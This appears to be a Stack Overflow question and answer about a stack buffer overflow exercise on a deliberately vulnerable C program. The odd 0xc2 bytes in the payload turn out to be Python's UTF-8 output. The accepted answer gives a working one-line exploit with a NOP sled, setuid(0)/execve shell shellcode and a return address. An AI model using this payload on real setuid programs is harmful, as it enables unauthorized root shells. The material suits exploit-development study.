# Why is my stack filled with 0xc2 instructions when I passed the 0x90 instruction?

Tags: python, assembly, buffer-overflow, exploit

I have a C program to exploit buffer overflow

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int overflow(char *input) {
  char buf[256];
  strcpy(buf, input);
  return 1;
}

int main(int argc, char *argv[]) {
  overflow(argv[1]);
  printf("meow =^..^=\n");
  return 1;
}
```

I try to fill my stack with 0x90 instructions. For that, I use the following command and inspect with GDB:

```bash
./vuln $(python -c 'print ("\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4)')
```

```bash
0xffffd1cc: 0x41    0x41    0x41    0x41    0x41    0xc2    0x90    0xc2
0xffffd1d4: 0x90    0xc2    0x90    0xc2    0x90    0xc2    0x90    0xc2
0xffffd1dc: 0x90    0xc2    0x90    0xc2    0x90    0xc2    0x90    0xc2
0xffffd1e4: 0x90    0xc2    0x90    0xc2    0x90    0xc2    0x90    0xc2
0xffffd1ec: 0x90    0xc2    0x90    0xc2    0x90    0xc2    0x90    0xc2
0xffffd1f4: 0x90    0xc2    0x90    0xc2    0x90    0xc2    0x90    0xc2
```

As you can see, the stack receives the 0xc2 instruction interspersed with 0x90 (the only one I requested). I believe this comes from some protection, but I'm not sure.

Is this protection? If so, is there any way to bypass it? If not, what would it be?

Thanks for all the help.

Comment: It's more likely to be utf8 encoding issue.

Comment: `python -c 'print ("\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4)' | hexdump -C` shows that the python program itself is outputting those `C2 90` byte pairs.  Like Jester said, probably UTF-8.  `LANG=C python ...` doesn't help either.

Comment: So this is really a [python] question about how to get it to print the binary data you want.  The fact that it's for injecting into a C program compiled for x86 (where 0x90 is a 1-byte NOP) is relevant only in that many people have probably had to solve the same specific problem.

Comment: The problem was the hex code and how Python handled it. Thanks for the help, I posted an alternative to the problem in PHP

Answer (score 0, accepted):

The problem was how Python handled hex, I found an alternative by switching to PHP. Here is the implemented code:

```
./vuln $(php -r 'echo str_repeat("\x41", 179). str_repeat("\x90", 56) . "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" . "\xc0\xd3\xff\xff";')
```